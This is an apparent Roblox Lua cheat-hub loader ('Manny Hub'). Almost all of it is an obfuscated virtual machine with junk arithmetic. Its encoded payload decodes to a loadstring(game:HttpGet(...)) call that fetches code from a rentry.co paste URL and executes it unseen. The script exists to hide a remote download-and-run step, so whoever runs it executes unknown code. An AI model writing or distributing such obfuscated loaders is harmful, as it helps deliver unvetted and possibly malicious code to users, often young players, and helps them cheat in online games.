--[[

      ___           ___           ___           ___           ___                    ___           ___           ___     
     /\__\         /\  \         /\__\         /\__\         |\__\                  /\__\         /\__\         /\  \    
    /::|  |       /::\  \       /::|  |       /::|  |        |:|  |                /:/  /        /:/  /        /::\  \   
   /:|:|  |      /:/\:\  \     /:|:|  |      /:|:|  |        |:|  |               /:/__/        /:/  /        /:/\:\  \  
  /:/|:|__|__   /::\~\:\  \   /:/|:|  |__   /:/|:|  |__      |:|__|__            /::\  \ ___   /:/  /  ___   /::\~\:\__\ 
 /:/ |::::\__\ /:/\:\ \:\__\ /:/ |:| /\__\ /:/ |:| /\__\     /::::\__\          /:/\:\  /\__\ /:/__/  /\__\ /:/\:\ \:|__|
 \/__/~~/:/  / \/__\:\/:/  / \/__|:|/:/  / \/__|:|/:/  /    /:/~~/~             \/__\:\/:/  / \:\  \ /:/  / \:\~\:\/:/  /
       /:/  /       \::/  /      |:/:/  /      |:/:/  /    /:/  /                    \::/  /   \:\  /:/  /   \:\ \::/  / 
      /:/  /        /:/  /       |::/  /       |::/  /     \/__/                     /:/  /     \:\/:/  /     \:\/:/  /  
     /:/  /        /:/  /        /:/  /        /:/  /                               /:/  /       \::/  /       \::/__/   
     \/__/         \/__/         \/__/         \/__/                                \/__/         \/__/         ~~       

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v109=0;local v110;while true do if (v109==1) then return v110;end if (v109==0) then v110=v5(v89,v19);v19=nil;v109=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=0 -0 ;local v91;while true do if (v90==(0 -0)) then v91=(v31/((5 -3)^(v32-(1 -0))))%((4 -(1067 -(68 + 997)))^(((v33-(620 -(555 + 64))) -(v32-((2202 -(226 + 1044)) -(857 + 74)))) + (569 -(367 + 201)))) ;return v91-(v91%(928 -(214 + 713))) ;end end else local v92=0 + 0 ;local v93;while true do if (v92==(0 + 0)) then v93=(879 -(282 + 595))^(v32-1) ;return (((v31%(v93 + v93))>=v93) and (1638 -(1523 + 114))) or ((0 -0) + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=117 -(32 + 85) ;local v36;local v37;while true do if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + 2 + 0 ;v35=1 + 0 ;end if (v35==(958 -(892 + 65))) then return (v37 * (188 + 68)) + v36 ;end end end local function v23() local v38=0;local v39;local v40;local v41;local v42;while true do if (v38==((997 -(915 + 82)) -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v38=953 -(802 + 150) ;end if (v38==(2 -1)) then return (v42 * (30433252 -13656036)) + (v41 * 65536) + (v40 * (187 + 69)) + v39 ;end end end local function v24() local v43=0 -0 ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==(1 + 0)) then v46=(4 -3) -0 ;v47=(v20(v45,1188 -(970 + 99 + 118) ,(119 -46) -(119 -66) ) * ((4 -2)^(69 -37))) + v44 ;v43=1 + 1 ;end if (v43==(1 + 2)) then if (v48==((0 -0) -0)) then if (v47==((253 + 632) -(261 + 624))) then return v49 * (0 + 0) ;else local v126=791 -(368 + 423) ;while true do if (v126==(0 -0)) then v48=(2380 -1299) -(1020 + (1473 -(447 + 966))) ;v46=1423 -((1724 -1094) + 793) ;break;end end end elseif (v48==((8753 -(1703 + 114)) -4889)) then return ((v47==(0 -0)) and (v49 * ((19 -(10 + 8))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1465 -(416 + 26)) ) * (v46 + (v47/((1749 -(760 + 987))^(165 -113)))) ;end if ((0 + 0)==v43) then v44=v23();v45=v23();v43=1 -0 ;end if (v43==(440 -(145 + 293))) then v48=v20(v45,451 -(44 + 386) ,1517 -(998 + (1189 -(376 + 325))) );v49=((v20(v45,11 + 21 )==(3 -2)) and  -(1 + 0)) or (773 -(201 + (1836 -(243 + 1022)))) ;v43=1058 -(87 + 968) ;end end end local function v25(v50) local v51;if  not v50 then local v94=0;while true do if (v94==(0 -0)) then v50=v23();if (v50==(0 + 0)) then return "";end break;end end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v68=1181 -((1377 -(163 + 91)) + 57) , #v51 do v52[v68]=v2(v1(v3(v51,v68,v68)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102) local v95=(function() return 561 -(79 + 482) ;end)();local v96=(function() return;end)();local v98=(function() return;end)();while true do if (v95~=(0 -0)) then else local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();while true do if (0==v115) then v116=(function() return 285 -(134 + 151) ;end)();while true do if (v116~=(1665 -(970 + 695))) then else v96=(function() return v97();end)();v98=(function() return nil;end)();v116=(function() return 1 -0 ;end)();end if (v116~=(1991 -(582 + 1408))) then else v95=(function() return  #"/";end)();break;end end break;end end end if ( #"|"==v95) then if (v96== #"|") then v98=(function() return v97()~=(0 -0) ;end)();elseif (v96==(2 -0)) then v98=(function() return v99();end)();elseif (v96== #"91(") then v98=(function() return v100();end)();end v101[v102]=(function() return v98;end)();break;end end return v95,v96,v97,v98,v99,v100,v101,v102;end;end)();local v54=(function() return function(v103,v104,v105) local v106=(function() return 0 -0 ;end)();while true do if (v106~=(1824 -(1195 + 629))) then else local v118=(function() return 0 -0 ;end)();local v119=(function() return;end)();while true do if (v118==(241 -(187 + 54))) then v119=(function() return 780 -(162 + 618) ;end)();while true do if (v119==0) then local v128=(function() return 0;end)();while true do if (v128==0) then v103[v104-#"[" ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v70= #"\\",v59 do FlatIdent_A9A3,Type,v21,Cons,v24,v25,v60,v70=(function() return v53(FlatIdent_A9A3,Type,v21,Cons,v24,v25,v60,v70);end)();end v58[ #"-19"]=(function() return v21();end)();for v71= #"]",v23() do local v72=(function() return 0;end)();local v73=(function() return;end)();while true do if (v72~=0) then else v73=(function() return v21();end)();if (v20(v73, #"[", #"/")==(0 + 0)) then local v122=(function() return 0 + 0 ;end)();local v123=(function() return;end)();local v124=(function() return;end)();local v125=(function() return;end)();while true do if (v122==(1 -0)) then v125=(function() return {v22(),v22(),nil,nil};end)();if (v123==(0 -0)) then local v129=(function() return 0 + 0 ;end)();while true do if (v129~=0) then else v125[ #"nil"]=(function() return v22();end)();v125[ #"xnxx"]=(function() return v22();end)();break;end end elseif (v123== #"/") then v125[ #"nil"]=(function() return v23();end)();elseif (v123==2) then v125[ #"91("]=(function() return v23() -(2^(1652 -(1373 + 263))) ;end)();elseif (v123== #"-19") then local v181=(function() return 0;end)();while true do if (v181==(1000 -(451 + 549))) then v125[ #"gha"]=(function() return v23() -(2^(6 + 10)) ;end)();v125[ #"?id="]=(function() return v22();end)();break;end end end v122=(function() return 2;end)();end if (v122==(0 -0)) then v123=(function() return v20(v73,2, #"asd");end)();v124=(function() return v20(v73, #"0836",9 -3 );end)();v122=(function() return 1385 -(746 + 638) ;end)();end if (v122==2) then if (v20(v124, #".", #":")~= #"}") then else v125[2]=(function() return v60[v125[1 + 1 ]];end)();end if (v20(v124,2 -0 ,2)~= #"]") then else v125[ #"gha"]=(function() return v60[v125[ #"asd"]];end)();end v122=(function() return 3;end)();end if (v122~=3) then else if (v20(v124, #"nil", #"asd")~= #">") then else v125[ #"http"]=(function() return v60[v125[ #".com"]];end)();end v55[v71]=(function() return v125;end)();break;end end end break;end end end for v74= #">",v23() do v56,v74,v28=(function() return v54(v56,v74,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[342 -(218 + 123) ];local v66=v62[1583 -(1535 + (1248 -(373 + 829))) ];local v67=v62[3 + (731 -(476 + 255)) ];return function(...) local v75=v65;local v76=v66;local v77=v67;local v78=v27;local v79=1 + 0 ;local v80= -(561 -(306 + 254));local v81={};local v82={...};local v83=v12("#",...) -(1 + 0) ;local v84={};local v85={};for v107=0 -(1130 -(369 + 761)) ,v83 do if (v107>=v77) then v81[v107-v77 ]=v82[v107 + (1 -0) ];else v85[v107]=v82[v107 + (1468 -(899 + 329 + 239)) ];end end local v86=(v83-v77) + 1 + 0 ;local v87;local v88;while true do local v108=0 -0 ;while true do if ((v108==(603 -(268 + 335))) or (2087>2372)) then v87=v75[v79];v88=v87[291 -(60 + 230) ];v108=(1054 -473) -(361 + 219) ;end if (v108==1) then if ((v88<=(575 -(426 + 146))) or (4445<4149)) then if (v88<=(1 + 0)) then if (v88>((2758 -1302) -(282 + 1174))) then local v133;local v134,v135;local v136;local v137;v85[v87[984 -(18 + 964) ]]=v64[v87[814 -(569 + 242) ]];v79=v79 + (239 -(64 + 174)) + 0 ;v87=v75[v79];v85[v87[2 + 0 ]]=v64[v87[3]];v79=v79 + (2 -1) ;v87=v75[v79];v137=v87[852 -(20 + 830) ];v136=v85[v87[3 + 0 ]];v85[v137 + 1 + 0 ]=v136;v85[v137]=v136[v87[1 + 3 ]];v79=v79 + (1025 -(706 + 318)) ;v87=v75[v79];v85[v87[1253 -(721 + 530) ]]=v87[1274 -(945 + 326) ];v79=v79 + (2 -1) ;v87=v75[v79];v137=v87[2 + 0 ];v134,v135=v78(v85[v137](v13(v85,v137 + (701 -(271 + 429)) ,v87[3 + 0 ])));v80=(v135 + v137) -(1501 -(1408 + 92)) ;v133=0 -0 ;for v168=v137,v80 do v133=v133 + (1087 -(461 + 625)) ;v85[v168]=v134[v133];end v79=v79 + ((184 + 1105) -(993 + 295)) ;v87=v75[v79];v137=v87[1 + 1 ];v85[v137]=v85[v137](v13(v85,v137 + ((1735 -563) -(418 + 753)) ,v80));v79=v79 + 1 ;v87=v75[v79];v85[v87[1 + 1 ]]();v79=v79 + 1 + 0 ;v87=v75[v79];do return;end else local v152=0 + (336 -(144 + 192)) ;local v153;while true do if ((v152==(0 + 0)) or (1818==85)) then v153=v87[(217 -(42 + 174)) + 1 ];v85[v153]=v85[v153](v13(v85,v153 + ((735 + 243) -(553 + 424)) ,v80));break;end end end elseif (v88==(531 -(406 + 123))) then v85[v87[(3 + 0) -1 ]]();else local v154=v87[1771 -(1749 + 20) ];local v155=v85[v87[1 + 0 + 2 ]];v85[v154 + ((2827 -(363 + 1141)) -(1249 + 73)) ]=v155;v85[v154]=v155[v87[2 + 2 ]];end elseif (v88<=(1150 -(466 + 679))) then if (v88==(9 -5)) then do return;end else v85[v87[5 -(1583 -(1183 + 397)) ]]=v64[v87[1903 -(106 + 1794) ]];end elseif ((630<2127) and (v88==(2 + 4))) then v85[v87[1 + 1 ]]=v87[3];else local v163=0 -0 ;local v164;local v165;local v166;local v167;while true do if (v163==(2 -(1 + 0))) then v80=(v166 + v164) -1 ;v167=0 -0 ;v163=116 -(3 + 1 + 110) ;end if (v163==2) then for v179=v164,v80 do local v180=584 -(57 + 527) ;while true do if (v180==(1427 -(41 + (3361 -(1913 + 62))))) then v167=v167 + 1 + 0 ;v85[v179]=v165[v167];break;end end end break;end if (v163==(103 -(17 + 86))) then v164=v87[2 + 0 ];v165,v166=v78(v85[v164](v13(v85,v164 + (1 -0) ,v87[3])));v163=2 -1 ;end end end v79=v79 + (167 -(122 + 44)) ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F72656E7472792E636F2F33356535373975622F72617700083O0012013O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
